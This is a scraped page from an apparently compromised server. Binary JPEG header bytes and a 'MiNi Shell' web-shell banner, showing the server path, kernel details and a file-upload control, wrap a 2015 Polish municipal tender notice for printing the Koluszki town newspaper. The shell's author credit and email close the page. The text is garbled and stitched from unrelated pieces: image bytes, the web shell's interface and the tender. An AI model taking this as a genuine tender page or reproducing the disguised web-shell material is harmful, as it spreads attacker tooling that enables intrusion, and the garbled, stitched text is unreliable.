JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150114/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150114/9572-N-2015.html

<p class="kh_header"><b>Koluszki: Drukowanie samorządowej gazety Tydzień w Koluszkach</b><br>
<b>Numer ogłoszenia: 9572 - 2015; data zamieszczenia: 14.01.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w Koluszkach , ul. 11-go Listopada 65, 95-040 Koluszki, woj. łódzkie, tel. 044 7256700, faks 044 7145840.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.koluszki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Drukowanie samorządowej gazety Tydzień w Koluszkach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)Przedmiotem niniejszego zamówienia  jest drukowanie  gazety Tydzień 
w Koluszkach wydawanej przez  Urząd Miejski w Koluszkach  w  ilości  maksymalnej 160  numerów gazety.
2) Informacje i warunki drukowania  gazety Tydzień w Koluszkach.
a) nakład  w  jednej z następujących ilości: 2200, 2300, 2400, 2500, 2600, 2700, 2800, 2900, 3000  egzemplarzy, 
b)  ilość  drukowanych  stron  może wynosić: 16, 20, 24 stron,
Uwaga: Ilość drukowanych egzemplarzy, oraz ilość stron będzie  każdorazowo podawana przez Zamawiającego  przy dostarczaniu materiałów do druku. Zapłata
za  wykonany  druk będzie  po cenach  zaoferowanych w formularzu  ofertowym.  
3) Parametry druku  
a) formatu  A4,
b) druk  na papierze  offsetowym 90 g,
c) okładka w pełnym  kolorze, ( lub  opcjonalne  okładka  i  rozkładówka  w pełnym  
   kolorze)  a pozostałe strony i  zdjęcia  czarno- białe,
d)  bez zszywania  wydrukowanych  egzemplarzy,
e)  materiały w formie  cyfrowej  będą  przesłane pocztą  elektroniczną  lub  dostarczone do drukarni  na płytach CD  w formie uzgodnionej  z drukarnią..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.81.00.00-5, 79.82.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.02.2018.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie  podpisanych  oświadczeń o spełnieniu warunków udziału w postępowaniu, o których mowa  w  art. 22 ust. 1 i  niepodleganiu  wykluczeniu na podstawie Art. 24 Ustawy Prawo  Zamówień  Publicznych, oraz gdy Wykonawca załączy aktualny odpis  z właściwego  rejestru, jeżeli odrębne przepisy wymagają  wpisu  do  rejestru  wystawionego  nie  wcześniej  niż  6 miesięcy  przed upływem  terminu  składania  ofert. 
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów i oświadczeń na zasadzie: spełnia / nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  uzna  ten  warunek  za  spełniony  na  podstawie  podpisanego  oświadczenie  o  spełnieniu  warunków udziału  w  postępowaniu,  o których mowa  
w art. 22 ust.1 Ustawy Prawo Zamówień Publicznych, oraz gdy Wykonawca  wykaże,  że w okresie ostatnich  trzech lat  przed upływem  terminu  składania ofert, a jeżeli  okres prowadzenia działalności  jest  krótszy - w  tym okresie,  zrealizował  minimum  trzy usługi  drukowania  gazet  samorządowych,  branżowych,  tematycznych lub folderów o wartości  brutto nie  mniejszej niż 30 tys. złotych  ( słownie: trzydzieści  tysięcy złotych) każda realizacja, potwierdzonych dowodami,  że usługi  zostały  wykonane  lub  są  wykonane  należycie.
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie  niniejszego zamówienia, oceniana  będzie  ich  łączna wiedza i doświadczenie
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów i oświadczeń na  zasadzie: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie podpisanego  oświadczenia  o  spełnieniu   warunków  udziału  w  postępowaniu, o których mowa  
w  art. 22 ust.1 Ustawy Prawo  Zamówień  Publicznych.
Ocena  spełnienia  warunków  będzie  dokonywana  na  podstawie złożonych dokumentów  i  oświadczeń na  zasadzie: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie podpisanego  oświadczenia  o  spełnieniu   warunków  udziału  w  postępowaniu, o których mowa  
w  art. 22 ust.1 Ustawy Prawo  Zamówień  Publicznych.
Ocena spełnienia warunków będzie dokonywana na podstawie złożonych dokumentów  i oświadczeń na zasadzie: spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna  ten warunek  za  spełniony na podstawie podpisanego  oświadczenia  o  spełnieniu   warunków  udziału  w  postępowaniu, o których mowa  
w art. 22 ust.1 Ustawy Prawo Zamówień  Publicznych.
Ocena  spełnienia  warunków będzie dokonywana na podstawie złożonych dokumentów  i  oświadczeń na  zasadzie: spełnia / nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony  formularz ofertowy  (załącznik  nr 1 do Specyfikacji  Istotnych  Warunków  Zamówienia ),
2. Wypełniony  formularz  cen  jednostkowych  (załączniki nr 2 do Specyfikacji  Istotnych Warunków Zamówienia ),
3. W przypadku, gdy podmioty występują wspólnie Wykonawcy powinni ustanowić  pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo  reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia  publicznego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Zaoferowanie drukowania rozkładówki gazety w pełnym kolorze - 4</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zamawiający dopuszcza zmianę postanowień zawartej umowy w stosunku do treści oferty, na podstawie  której  dokonano wyboru wykonawcy w następujących przypadkach:
a) w  uzasadnionych przypadkach lub  innych okolicznościach  niezależnych  od Zamawiającego  lub  Wykonawcy  konieczna  będzie zmiana  terminu lub godzin  realizacji  zamówienia, Zamawiający na wniosek Wykonawcy lub z własnej inicjatywy  może przedłużyć lub zmienić termin realizacji zamówienia,
b) w innych uzasadnionych przypadkach niezależnych od  Wykonawcy,  
a  w szczególności, gdy  nie jest możliwe dostarczenie  wskazanych  w  ofercie  parametrów techniczno - jakościowych  drukowanej  gazety, Zamawiający na pisemny  wniosek  Wykonawcy  dopuszcza  zmianę  na  inne  spełniające  warunki  opisane  w  S.I.W.Z. W  takim  przypadku Zamawiający może wyrazić zgodę na  dokonanie  takiej  zmiany. 
c) w innych uzasadnionych  przypadkach,  gdy zajdzie konieczność  wprowadzenia  koniecznych  zmian  wynikających  z  okoliczności,  których nie można  było przewidzieć  w chwili  zawarcia  umowy  a w szczególności  jeżeli nastąpi  zmiana  powszechnie obowiązujących  przepisów  prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,  zamawiający może wprowadzić  zmiany  umowy  wynikające z tych przepisów.
d) w przypadku,  gdy zmiany postanowień zawartej  umowy będą  korzystne dla Zamawiającego, a  zmiany  te wynikły  w  trakcie  realizacji  zamówienia, Zamawiający  za zgodą Wykonawcy może dokonać  takiej  zmiany.
e) działania siły  wyższej, przez którą rozumieć należy zdarzenie zewnętrzne 
o charakterze niezależnym  od  stron, którego strony nie mogły przewidzieć przed zawarciem umowy, którego nie  można uniknąć,  ani  któremu strony nie mogły zapobiec przy  zachowaniu  należytej  staranności,  której nie można przypisać drugiej stronie.  Za siłę  wyższą warunkującą zmianę umowy uważać się będzie 
w szczególności:  powódź, pożar i  inne  klęski  żywiołowe, nagłe przerwy w dostawie energii elektrycznej  trwające powyżej 5 godzin,  promieniowanie  lub  skażenia,
f) zmiany podmiotu trzeciego (podwykonawcy  na etapie realizacji zamówienia),
a  nowy  podwykonawca wykaże spełnianie warunków w zakresie nie mniejszym niż wskazany na  etapie postępowania o zamówienie publiczne  dotychczasowy podwykonawca,
g) w przypadku  ustawowej  zmiany stawki  podatku od  towarów i  usług  (VAT ) cena  netto  pozostanie  bez  zmian, a  kwota  podatku  VAT i wartość brutto zostanie  odpowiednio  skorygowana   zgodnie  z  aktualnie obowiązującymi przepisami  podatkowymi.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.koluszki.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w  Koluszkach przy ul. 11 Listopada 65 pok nr 203.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2015 godzina 09:30, miejsce: kancelaria Urzędu  Miejskiego w Koluszkach przy ul. 11 Listopada 65.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com